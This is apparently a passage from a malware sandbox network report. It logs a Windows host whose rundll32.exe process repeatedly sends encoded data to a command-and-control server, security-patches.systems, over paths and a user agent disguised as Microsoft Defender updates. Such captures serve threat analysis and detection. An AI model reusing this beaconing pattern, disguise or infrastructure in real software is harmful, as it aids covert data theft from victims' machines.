Dec 6, 2024 22:12:52.439371109 CET	4443	49818	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:52.443460941 CET	49818	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:52.563607931 CET	4443	49818	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:52.564241886 CET	49818	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:52.588279009 CET	49819	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:52.708102942 CET	4443	49819	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:52.709635973 CET	49819	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:52.711251974 CET	49819	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:52.831104994 CET	4443	49819	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:54.170114994 CET	4443	49819	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:54.171680927 CET	49819	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:54.291938066 CET	4443	49819	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:54.292133093 CET	49819	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:54.305282116 CET	49820	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:54.425110102 CET	4443	49820	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:54.425193071 CET	49820	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:54.426835060 CET	49820	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:54.546648979 CET	4443	49820	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:55.877197027 CET	4443	49820	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:55.878561020 CET	49820	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:55.999680042 CET	4443	49820	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:55.999797106 CET	49820	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:56.008074045 CET	49821	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:56.127909899 CET	4443	49821	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:56.128047943 CET	49821	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:56.129458904 CET	49821	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:56.249191046 CET	4443	49821	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:57.580692053 CET	4443	49821	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:57.582312107 CET	49821	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:57.702579021 CET	4443	49821	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:57.702675104 CET	49821	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:57.714452982 CET	49822	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:57.834192038 CET	4443	49822	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:57.834294081 CET	49822	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:57.835892916 CET	49822	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:57.955820084 CET	4443	49822	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:59.294399977 CET	4443	49822	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:59.296108007 CET	49822	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:59.416610956 CET	4443	49822	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:59.416711092 CET	49822	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:59.432818890 CET	49823	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:59.552583933 CET	4443	49823	185.234.216.175	192.168.2.5
Dec 6, 2024 22:12:59.552661896 CET	49823	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:59.554130077 CET	49823	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:12:59.674082041 CET	4443	49823	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:00.998343945 CET	4443	49823	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:01.000220060 CET	49823	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:01.120568037 CET	4443	49823	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:01.120692968 CET	49823	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:01.151335001 CET	49824	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:01.271226883 CET	4443	49824	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:01.271492958 CET	49824	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:01.273061991 CET	49824	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:01.393234015 CET	4443	49824	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:02.758141041 CET	4443	49824	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:02.759855986 CET	49824	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:02.880177975 CET	4443	49824	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:02.880248070 CET	49824	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:02.902131081 CET	49825	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:03.022102118 CET	4443	49825	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:03.022222996 CET	49825	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:03.080204964 CET	49825	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:03.200234890 CET	4443	49825	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:04.500267029 CET	4443	49825	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:04.503164053 CET	49825	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:04.623913050 CET	4443	49825	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:04.623970032 CET	49825	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:04.635498047 CET	49826	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:04.755306005 CET	4443	49826	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:04.755412102 CET	49826	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:04.756861925 CET	49826	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:04.876600027 CET	4443	49826	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:06.207870960 CET	4443	49826	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:06.209502935 CET	49826	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:06.329703093 CET	4443	49826	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:06.329896927 CET	49826	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:06.354526997 CET	49827	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:06.474365950 CET	4443	49827	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:06.474463940 CET	49827	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:06.476110935 CET	49827	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:06.595948935 CET	4443	49827	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:07.931963921 CET	4443	49827	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:07.933530092 CET	49827	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:08.053797960 CET	4443	49827	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:08.053898096 CET	49827	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:08.094630003 CET	49828	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:08.214447021 CET	4443	49828	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:08.214576960 CET	49828	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:08.219103098 CET	49828	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:08.338836908 CET	4443	49828	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:09.700627089 CET	4443	49828	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:09.702228069 CET	49828	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:09.822844028 CET	4443	49828	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:09.825898886 CET	49828	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:09.837709904 CET	49829	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:09.958017111 CET	4443	49829	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:09.958117962 CET	49829	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:09.959602118 CET	49829	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:10.080177069 CET	4443	49829	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:11.124970913 CET	49830	443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:11.125020981 CET	443	49830	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:11.125097990 CET	49830	443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:11.126507998 CET	49830	443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:11.126523018 CET	443	49830	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:11.500988960 CET	4443	49829	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:11.502665997 CET	49829	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:11.623375893 CET	4443	49829	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:11.625911951 CET	49829	4443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:12.689879894 CET	443	49830	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:12.689944983 CET	49830	443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:12.693268061 CET	49830	443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:12.693279982 CET	443	49830	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:12.693509102 CET	443	49830	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:12.693701982 CET	49830	443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:12.694941044 CET	49830	443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:12.735338926 CET	443	49830	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:13.253110886 CET	443	49830	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:13.253130913 CET	443	49830	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:13.253950119 CET	49830	443	192.168.2.5	185.234.216.175
Dec 6, 2024 22:13:13.253979921 CET	443	49830	185.234.216.175	192.168.2.5
Dec 6, 2024 22:13:13.255824089 CET	49830	443	192.168.2.5	185.234.216.175

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 22:11:02.704314947 CET	63467	53	192.168.2.5	1.1.1.1
Dec 6, 2024 22:11:03.056318045 CET	53	63467	1.1.1.1	192.168.2.5
Dec 6, 2024 22:11:08.202208042 CET	57219	53	192.168.2.5	1.1.1.1
Dec 6, 2024 22:11:08.340694904 CET	53	57219	1.1.1.1	192.168.2.5
Dec 6, 2024 22:11:33.020859957 CET	64814	53	192.168.2.5	1.1.1.1
Dec 6, 2024 22:11:33.159064054 CET	53	64814	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2024 22:11:02.704314947 CET	192.168.2.5	1.1.1.1	0xca3b	Standard query (0)	axizlhop.life	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:11:08.202208042 CET	192.168.2.5	1.1.1.1	0x9c42	Standard query (0)	security-patches.systems	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:11:33.020859957 CET	192.168.2.5	1.1.1.1	0x79de	Standard query (0)	security-patches.systems	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 6, 2024 22:11:03.056318045 CET	1.1.1.1	192.168.2.5	0xca3b	No error (0)	axizlhop.life	104.21.40.3	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:11:03.056318045 CET	1.1.1.1	192.168.2.5	0xca3b	No error (0)	axizlhop.life	172.67.172.216	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:11:08.340694904 CET	1.1.1.1	192.168.2.5	0x9c42	No error (0)	security-patches.systems	185.234.216.175	A (IP address)	IN (0x0001)	false
Dec 6, 2024 22:11:33.159064054 CET	1.1.1.1	192.168.2.5	0x79de	No error (0)	security-patches.systems	185.234.216.175	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

axizlhop.life

security-patches.systems

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49733	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:33.293389082 CET	741	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 525 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6e 4e 30 56 32 67 31 54 30 5a 4d 51 32 31 50 61 57 35 34 64 7a 30 69 4c 43 4a 47 63 33 52 4d 49 6a 6f 69 63 54 68 79 54 6a 64 77 54 58 42 43 62 6b 74 70 4b 32 31 6e 52 58 5a 44 62 6c 4e 79 61 45 45 39 49 69 77 69 53 47 52 57 55 58 42 42 49 6a 6f 69 63 69 38 72 52 6a 5a 6a 51 6a 4a 4d 56 6c 68 71 49 69 77 69 55 55 5a 61 65 57 6c 70 56 56 68 5a 49 6a 6f 69 4d 6d 4a 32 56 57 35 61 55 58 6b 69 4c 43 4a 53 59 6d 39 30 49 6a 6f 69 64 57 4e 68 65 54 51 72 51 6c 64 44 4d 6c 68 6d 49 69 77 69 55 32 4a 61 56 32 35 59 49 6a 6f 69 4d 7a 64 71 55 6d 31 61 56 58 63 69 4c 43 4a 5a 61 30 70 58 49 6a 70 62 49 6e 52 50 61 55 77 69 58 53 77 69 59 32 5a 4c 57 43 49 36 49 6a 4a 6e 50 54 30 69 4c 43 4a 6f 54 6d 39 32 53 6d 30 69 4f 69 4a 77 4b 32 56 56 65 6d 4e 7a 63 30 5a 6f 62 58 5a 71 52 45 4a 69 4e 6c 56 58 63 6d 39 42 50 54 30 69 4c 43 4a 76 51 6e 56 4e 56 58 55 69 4f 69 4a 71 4b 31 64 48 65 44 68 73 4d 79 49 73 49 6e 4e 30 64 56 6b 69 4f 69 49 78 63 6d 70 61 62 [TRUNCATED] Data Ascii: data=eyJBbldGaCI6InN0V2g1T0ZMQ21PaW54dz0iLCJGc3RMIjoicThyTjdwTXBCbktpK21nRXZDblNyaEE9IiwiSGRWUXBBIjoici8rRjZjQjJMVlhqIiwiUUZaeWlpVVhZIjoiMmJ2VW5aUXkiLCJSYm90IjoidWNheTQrQldDMlhmIiwiU2JaV25YIjoiMzdqUm1aVXciLCJZa0pXIjpbInRPaUwiXSwiY2ZLWCI6IjJnPT0iLCJoTm92Sm0iOiJwK2VVemNzc0ZobXZqREJiNlVXcm9BPT0iLCJvQnVNVXUiOiJqK1dHeDhsMyIsInN0dVkiOiIxcmpabVE9PSIsInZvSmMiOiJtT2FxeXc9PSIsIndBY0giOiJxT0NPeWNzM2FnPT0iLCJ3UWVSSCI6IjJMM0E2czV3IiwieGVDY2pTIjoidS9xRjJnPT0iLCJ5aWlVWFkiOiJyYk84Lzg1cUlGLzR2QU42OVI2b29uNVRrd2w3ZGJvanhoUXdTVmdYRWdJPSJ9
Dec 6, 2024 22:11:34.878926992 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:34 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49739	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:35.035471916 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:36.501916885 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49741	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:36.757502079 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:38.216408014 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49746	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:38.479367018 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:39.948884010 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49752	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:40.213043928 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:41.680079937 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:41 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49756	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:41.945080042 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:43.394124031 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:43 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49761	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
